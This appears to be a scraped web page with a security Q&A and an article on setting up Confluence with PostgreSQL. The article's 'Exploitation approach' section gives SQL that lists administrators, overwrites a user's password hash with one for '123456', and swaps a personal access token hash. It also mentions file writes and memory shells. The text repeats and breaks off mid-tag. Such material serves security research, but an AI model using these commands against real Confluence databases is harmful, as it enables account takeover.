[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$ftMtLR7acAyF2QMKvwRk-9hUPYuZHW3s7MVd9zdwvvZ4":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},405,"Where are Confluence user credentials stored, and how can an attacker modify them to gain unauthorized access?","User credentials are stored in the `CWD_USER` table within the Confluence database. An attacker with database access can modify the `credential` column to a known hash, such as `{PKCS5S2}UokaJs5wj02LBUJABpGmkxvCX0q+IbTdaUfxy1M9tVOeI38j95MRrVxWjNCu6gsm` (which corresponds to plaintext password `123456`), using an UPDATE SQL command. This technique is an exploitation approach described in the [Confluence Usage Guide](\u002Fnews\u002Fconfluence-usage-guide) and is similar to other database-level attacks seen in vulnerability debugging setups like [GoAnywhere MFT](\u002Fnews\u002Fsetting-up-goanywhere-managed-file-transfer-vulnerability-debugging-environment).","\u003Cp>User credentials are stored in the `CWD_USER` table within the Confluence database. An attacker with database access can modify the `credential` column to a known hash, such as `{PKCS5S2}UokaJs5wj02LBUJABpGmkxvCX0q+IbTdaUfxy1M9tVOeI38j95MRrVxWjNCu6gsm` (which corresponds to plaintext password `123456`), using an UPDATE SQL command. This technique is an exploitation approach described in the [Confluence Usage Guide](\u002Fnews\u002Fconfluence-usage-guide) and is similar to other database-level attacks seen in vulnerability debugging setups like [GoAnywhere MFT](\u002Fnews\u002Fsetting-up-goanywhere-managed-file-transfer-vulnerability-debugging-environment).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fconfluence-usage-guide\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","where-are-confluence-user-credentials-stored-and-how-can-an-attacker-modify-them-1777483816341","Confluence user credentials, CWD_USER table, credential modification, SQL UPDATE, password hash, exploitation",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},101,"Confluence Usage Guide","confluence-usage-guide","Step-by-step guide to install Confluence on CentOS 7 with PostgreSQL. Includes database configuration, user setup, and security considerations.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Confluence is a professional enterprise knowledge management and collaboration software, which can also be used to build enterprise wikis.\u003C\u002Fp>\u003Cp>Recently, the vulnerability CVE-2021-26084 - Confluence Server Webwork OGNL injection was disclosed. This article only introduces relevant knowledge of Confluence from a technical research perspective.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cul>\u003Cli>Confluence Environment Setup\u003C\u002Fli>\u003Cli>Exploitation Approach\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Confluence Environment Setup\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>References for environment setup:\u003C\u002Fp>\u003Cp>Windows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fconfluence.atlassian.com\u002Fdoc\u002Finstalling-confluence-on-windows-255362047.html\u003C\u002Fp>\u003Cp>Linux:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fconfluence.atlassian.com\u002Fdoc\u002Finstalling-confluence-on-linux-143556824.html\u003C\u002Fp>\u003Cp>This article uses CentOS 7 to set up Confluence as an example for introduction.\u003C\u002Fp>\u003Ch3>1. Configure the database\u003C\u002Fh3>\u003Cp>PostgreSQL is chosen here. Installation reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fconfluence.atlassian.com\u002Fdoc\u002Fdatabase-setup-for-postgresql-173244522.html\u003C\u002Fp>\u003Ch4>(1) Install PostgreSQL\u003C\u002Fh4>\u003Cp>Visit the address: https:\u002F\u002Fwww.postgresql.org\u002Fdownload\u002Flinux\u002Fredhat\u002F\u003C\u002Fp>\u003Cp>Obtain the installation command, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017390097_0_36139c2403.jpeg\">\u003C\u002Fp>\u003Cp>After installation is complete, check the running status:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>systemctl status postgresql-13\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Configure PostgreSQL\u003C\u002Fh4>\u003Cp>Set to allow other programs to access the database:\u003C\u002Fp>\u003Cp>Modify \u002Fvar\u002Flib\u002Fpgsql\u002F13\u002Fdata\u002Fpg_hba.conf\u003C\u002Fp>\u003Cp>Change METHOD to trust, set as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017416120_1_fe1454904b.jpeg\">\u003C\u002Fp>\u003Cp>Restart PostgreSQL:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>systemctl restart postgresql-13\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>Note: Configure to allow other IPs to access the database\u003C\u002Fh4>\u003Cp>Modify \u002Fvar\u002Flib\u002Fpgsql\u002F13\u002Fdata\u002Fpg_hba.conf\u003C\u002Fp>\u003Cp>Change ADDRESS to 0.0.0.0\u002F0, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017461818_2_9ac2253a05.jpeg\">\u003C\u002Fp>\u003Cp>Modify \u002Fvar\u002Flib\u002Fpgsql\u002F13\u002Fdata\u002Fpostgresql.conf\u003C\u002Fp>\u003Cp>Set listen_addresses = '*', as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017477942_3_fcf3b8e71c.jpeg\">\u003C\u002Fp>\u003Cp>Restart PostgreSQL:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>systemctl restart postgresql-13\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Database Operations\u003C\u002Fh4>\u003Cp>After PostgreSQL installation, a user named postgres is created on the local operating system with no default password\u003C\u002Fp>\u003Cp>Switch to user postgres:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>su postgres\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Enter PostgreSQL:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>bash-4.2$ psql\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Set password for user postgres:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>postgres=# \\password postgres\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>View command description for creating user:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>postgres-# \\h create user\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017487592_4_62fddd79bd.jpeg\">\u003C\u002Fp>\u003Cp>Create user confluence:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>postgres-# create user confluenceuser with password 'confluenceuser' createdb login;\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Parameter description:\u003C\u002Fp>\u003Cul>\u003Cli>createdb: Has permission to create databases\u003C\u002Fli>\u003Cli>login: Has login permission\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Create database confluence:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>postgres-# create database confluence with owner=confluenceuser encoding='UTF8';\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Parameter description:\u003C\u002Fp>\u003Cul>\u003Cli>encoding: The specified encoding must be utf8\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Test user login:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[user@localhost ~]$ psql -h localhost -p 5432 -d confluence -U confluenceuser\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Install Confluence\u003C\u002Fh3>\u003Cp>Download address: https:\u002F\u002Fwww.atlassian.com\u002Fsoftware\u002Fconfluence\u002Fdownload-archives\u003C\u002Fp>\u003Cp>Select a version 7.11.3\u003C\u002Fp>\u003Cp>When downloading, choose 7.11.3 - Linux Installer (64 bit), as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017497650_5_fe5934c22f.jpeg\">\u003C\u002Fp>\u003Cp>Execute the installation command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[root@localhost ~]$ .\u002Fatlassian-confluence-7.11.3-x64.bin\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>During the installation process, select Express Install (uses default settings) [1], as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017506006_6_ae59a48c81.jpeg\">\u003C\u002Fp>\u003Cp>After installation, use a browser to access http:\u002F\u002Flocalhost:8090\u003C\u002Fp>\u003Cp>When setting up the Confluence page, you need to fill in the license, which can be obtained by visiting https:\u002F\u002Fmy.atlassian.com\u002Flicense\u002Fevaluation, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017511600_7_aa308d9496.jpeg\">\u003C\u002Fp>\u003Cp>Enter the database settings page and configure as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017516981_8_9bcbbba4ab.jpeg\">\u003C\u002Fp>\u003Cp>Next, set up the content, manage users, and administrator account pages in sequence\u003C\u002Fp>\u003Cp>The final success page is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017521255_9_24156fed9b.jpeg\">\u003C\u002Fp>\u003Cp>Access the login page: http:\u002F\u002Flocalhost:8090\u002Fwelcome.action, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017524493_10_7f30ee92e9.jpeg\">\u003C\u002Fp>\u003Ch3>3. Create a Confluence regular user\u003C\u002Fh3>\u003Cp>After logging in with the administrator account, select User management for user configuration, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017526856_11_4cebcb89f6.jpeg\">\u003C\u002Fp>\u003Cp>Add user test1 and configure as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017528245_12_0f840da2ed.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Administrator accounts correspond to the following two groups:\u003C\u002Fp>\u003Cul>\u003Cli>confluence-administrators\u003C\u002Fli>\u003Cli>confluence-users\u003C\u002Fli>\u003C\u002Ful>\u003Cp>After adding users, you can access http:\u002F\u002Flocalhost:8090\u002F to log in\u003C\u002Fp>\u003Ch2>0x03 Basic Knowledge\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. File Directory\u003C\u002Fh3>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.cwiki.us\u002Fdisplay\u002FCONF6ZH\u002FConfluence+Home+and+other+important+directories\u003C\u002Fp>\u003Ch4>(1) \u003Cconfluence-installation>\u003C\u002Fconfluence-installation>\u003C\u002Fh4>\u003Cp>Installation directory, used to store system files\u003C\u002Fp>\u003Cp>Default installation location:\u003C\u002Fp>\u003Cul>\u003Cli>Windows: C:\u002FProgram Files\u002FAtlassian\u002FConfluence\u002F\u003C\u002Fli>\u003Cli>Linux: \u002Fopt\u002Fatlassian\u002Fconfluence\u002F\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>(2) \u003Cconfluence-home>\u003C\u002Fconfluence-home>\u003C\u002Fh4>\u003Cp>Data directory, used for storing data\u003C\u002Fp>\u003Cp>Default installation location:\u003C\u002Fp>\u003Cul>\u003Cli>Windows: C:\u002FProgram Files\u002FAtlassian\u002FApplication Data\u002FConfluence\u002F\u003C\u002Fli>\u003Cli>Linux: \u002Fvar\u002Fatlassian\u002Fapplication-data\u002Fconfluence\u002F\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Connection between the two:\u003C\u002Fp>\u003Cp>The location of \u003Cconfluence-home> is defined in the \u003Cconfluence-installation>\u002Fconfluence\u002FWEB-INF\u002Fclasses\u002Fconfluence-init.properties file\u003C\u002Fconfluence-installation>\u003C\u002Fconfluence-home>\u003C\u002Fp>\u003Ch3>2. Database information\u003C\u002Fh3>\u003Cp>Location storing database configuration information: \u003Cconfluence-home>\u002Fconfluence.cfg.xml\u003C\u002Fconfluence-home>\u003C\u002Fp>\u003Ch3>3. User information\u003C\u002Fh3>\u003Cp>User information is located in the Confluence database\u003C\u002Fp>\u003Cp>Table storing user information: CWD_USER, specific column names are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>user_name: Username\u003C\u002Fli>\u003Cli>active: Whether enabled\u003C\u002Fli>\u003Cli>email_address: Email address\u003C\u002Fli>\u003Cli>credential: User credentials\u003C\u002Fli>\u003Cli>directory_id: User group, representing user permissions\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The specific user group name corresponding to directory_id can be viewed in the following ways:\u003C\u002Fp>\u003Cul>\u003Cli>Query the group_name column in the cwd_group table; the value for the administrator user group is confluence-administrators\u003C\u002Fli>\u003Cli>Query the directory_name column in the cwd_directory table; the value for the administrator user group is Confluence Internal Directory\u003C\u002Fli>\u003C\u002Ful>\u003Cp>SQL command to directly filter out administrator users:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>confluence=&gt; select u.id,u.user_name,u.active,u.credential from cwd_user u  join cwd_membership m on u.id=m.child_user_id join cwd_group g on m.parent_id=g.id join cwd_directory d on d.id=g.directory_id where g.group_name = 'confluence-administrators' and d.directory_name='Confluence Internal Directory';\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The execution result is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017530263_13_ae2c5943e3.jpeg\">\u003C\u002Fp>\u003Ch3>4. Log file location\u003C\u002Fh3>\u003Cp>\u003Cconfluence-home>\u002Flogs\u002F\u003C\u002Fconfluence-home>\u003C\u002Fp>\u003Ch3>5. Web path\u003C\u002Fh3>\u003Cp>\u003Cconfluence-installation>\u002Fconfluence\u002F\u003C\u002Fconfluence-installation>\u003C\u002Fp>\u003Cp>Windows: Confluence default permission is network service, which has write permission\u003C\u002Fp>\u003Cp>Linux: Confluence default permission is confluence, which does not have write permission\u003C\u002Fp>\u003Ch2>0x04 Exploitation approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Modify the database to implement user login\u003C\u002Fh3>\u003Ch4>(1) Modify user login credentials\u003C\u002Fh4>\u003Cp>Usage example:\u003C\u002Fp>\u003Cp>View key user information with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>confluence=&gt; select id,user_name,credential from cwd_user;\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execution result as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017531308_14_497ccfd2b2.jpeg\">\u003C\u002Fp>\u003Cp>Modify the credentials for user test2 with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>confluence=&gt; UPDATE cwd_user SET credential= '{PKCS5S2}UokaJs5wj02LBUJABpGmkxvCX0q+IbTdaUfxy1M9tVOeI38j95MRrVxWjNCu6gsm' WHERE id = 458755;\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Confirm the database has been modified, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017532196_15_3e0576ee7d.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>{PKCS5S2}UokaJs5wj02LBUJABpGmkxvCX0q+IbTdaUfxy1M9tVOeI38j95MRrVxWjNCu6gsm corresponds to the plaintext password 123456\u003C\u002Fp>\u003Ch4>(2) Modify Personal Access Tokens\u003C\u002Fh4>\u003Cp>Personal Access Tokens enable passwordless login.\u003C\u002Fp>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fconfluence.atlassian.com\u002Fbitbucketserver0610\u002Fpersonal-access-tokens-989761177.html\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdeveloper.atlassian.com\u002Fserver\u002Fconfluence\u002Fconfluence-server-rest-api\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.atlassian.com\u002FConfluenceServer\u002Frest\u002F7.11.6\u002F\u003C\u002Fp>\u003Cp>Usage example:\u003C\u002Fp>\u003Cp>In the test environment, the Personal Access Tokens table is AO_81F455_PERSONAL_TOKEN.\u003C\u002Fp>\u003Cp>Query statement:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>confluence=&gt; select * from \"AO_81F455_PERSONAL_TOKEN\";\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>To modify Personal Access Tokens, use the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>confluence=&gt; UPDATE \"AO_81F455_PERSONAL_TOKEN\" SET \"HASHED_TOKEN\"= '{PKCS5S2}Deoq\u002FpsifhVO0VE8qhJ6prfgOltOdJkeRH4cIxac9NtoXVodRQJciR95GW37gR7\u002F' WHERE \"ID\" = 4;\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>{PKCS5S2}Deoq\u002FpsifhVO0VE8qhJ6prfgOltOdJkeRH4cIxac9NtoXVodRQJciR95GW37gR7\u002F corresponds to the token MjE0NTg4NjQ3MTk2OrQ5JtSJgT\u002FrrRBmCY4zu+N+NaWZ\u003C\u002Fp>\u003Ch3>2. Write file\u003C\u002Fh3>\u003Cp>Web path: \u003Cconfluence-installation>\u002Fconfluence\u002F\u003C\u002Fconfluence-installation>\u003C\u002Fp>\u003Cp>Windows: Confluence default permissions are network service, with write access.\u003C\u002Fp>\u003Cp>Linux: Confluence default permissions are confluence, without write access, but memory shell can be attempted.\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the fundamental knowledge related to the exploitation of Confluence.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Confluence is a professional enterprise knowledge management and collaboration software, which can also be used to build enterprise wikis.\u003C\u002Fp>\u003Cp>Recently, the vulnerability CVE-2021-26084 - Confluence Server Webwork OGNL injection was disclosed. This article only introduces relevant knowledge of Confluence from a technical research perspective.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cul>\u003Cli>Confluence Environment Setup\u003C\u002Fli>\u003Cli>Exploitation Approach\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Confluence Environment Setup\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>References for environment setup:\u003C\u002Fp>\u003Cp>Windows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fconfluence.atlassian.com\u002Fdoc\u002Finstalling-confluence-on-windows-255362047.html\u003C\u002Fp>\u003Cp>Linux:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fconfluence.atlassian.com\u002Fdoc\u002Finstalling-confluence-on-linux-143556824.html\u003C\u002Fp>\u003Cp>This article uses CentOS 7 to set up Confluence as an example for introduction.\u003C\u002Fp>\u003Ch3>1. Configure the database\u003C\u002Fh3>\u003Cp>PostgreSQL is chosen here. Installation reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fconfluence.atlassian.com\u002Fdoc\u002Fdatabase-setup-for-postgresql-173244522.html\u003C\u002Fp>\u003Ch4>(1) Install PostgreSQL\u003C\u002Fh4>\u003Cp>Visit the address: https:\u002F\u002Fwww.postgresql.org\u002Fdownload\u002Flinux\u002Fredhat\u002F\u003C\u002Fp>\u003Cp>Obtain the installation command, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017390097_0_36139c2403-1.jpeg\">\u003C\u002Fp>\u003Cp>After installation is complete, check the running status:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>systemctl status postgresql-13\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(2) Configure PostgreSQL\u003C\u002Fh4>\u003Cp>Set to allow other programs to access the database:\u003C\u002Fp>\u003Cp>Modify \u002Fvar\u002Flib\u002Fpgsql\u002F13\u002Fdata\u002Fpg_hba.conf\u003C\u002Fp>\u003Cp>Change METHOD to trust, set as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017416120_1_fe1454904b-1.jpeg\">\u003C\u002Fp>\u003Cp>Restart PostgreSQL:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>systemctl restart postgresql-13\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>Note: Configure to allow other IPs to access the database\u003C\u002Fh4>\u003Cp>Modify \u002Fvar\u002Flib\u002Fpgsql\u002F13\u002Fdata\u002Fpg_hba.conf\u003C\u002Fp>\u003Cp>Change ADDRESS to 0.0.0.0\u002F0, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017461818_2_9ac2253a05-1.jpeg\">\u003C\u002Fp>\u003Cp>Modify \u002Fvar\u002Flib\u002Fpgsql\u002F13\u002Fdata\u002Fpostgresql.conf\u003C\u002Fp>\u003Cp>Set listen_addresses = '*', as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017477942_3_fcf3b8e71c-1.jpeg\">\u003C\u002Fp>\u003Cp>Restart PostgreSQL:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>systemctl restart postgresql-13\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>(3) Database Operations\u003C\u002Fh4>\u003Cp>After PostgreSQL installation, a user named postgres is created on the local operating system with no default password\u003C\u002Fp>\u003Cp>Switch to user postgres:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>su postgres\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Enter PostgreSQL:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>bash-4.2$ psql\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Set password for user postgres:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>postgres=# \\password postgres\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>View command description for creating user:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>postgres-# \\h create user\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017487592_4_62fddd79bd-1.jpeg\">\u003C\u002Fp>\u003Cp>Create user confluence:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>postgres-# create user confluenceuser with password 'confluenceuser' createdb login;\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Parameter description:\u003C\u002Fp>\u003Cul>\u003Cli>createdb: Has permission to create databases\u003C\u002Fli>\u003Cli>login: Has login permission\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Create database confluence:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>postgres-# create database confluence with owner=confluenceuser encoding='UTF8';\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Parameter description:\u003C\u002Fp>\u003Cul>\u003Cli>encoding: The specified encoding must be utf8\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Test user login:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[user@localhost ~]$ psql -h localhost -p 5432 -d confluence -U confluenceuser\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2. Install Confluence\u003C\u002Fh3>\u003Cp>Download address: https:\u002F\u002Fwww.atlassian.com\u002Fsoftware\u002Fconfluence\u002Fdownload-archives\u003C\u002Fp>\u003Cp>Select a version 7.11.3\u003C\u002Fp>\u003Cp>When downloading, choose 7.11.3 - Linux Installer (64 bit), as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017497650_5_fe5934c22f-1.jpeg\">\u003C\u002Fp>\u003Cp>Execute the installation command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[root@localhost ~]$ .\u002Fatlassian-confluence-7.11.3-x64.bin\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>During the installation process, select Express Install (uses default settings) [1], as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017506006_6_ae59a48c81-1.jpeg\">\u003C\u002Fp>\u003Cp>After installation, use a browser to access http:\u002F\u002Flocalhost:8090\u003C\u002Fp>\u003Cp>When setting up the Confluence page, you need to fill in the license, which can be obtained by visiting https:\u002F\u002Fmy.atlassian.com\u002Flicense\u002Fevaluation, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017511600_7_aa308d9496-1.jpeg\">\u003C\u002Fp>\u003Cp>Enter the database settings page and configure as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" 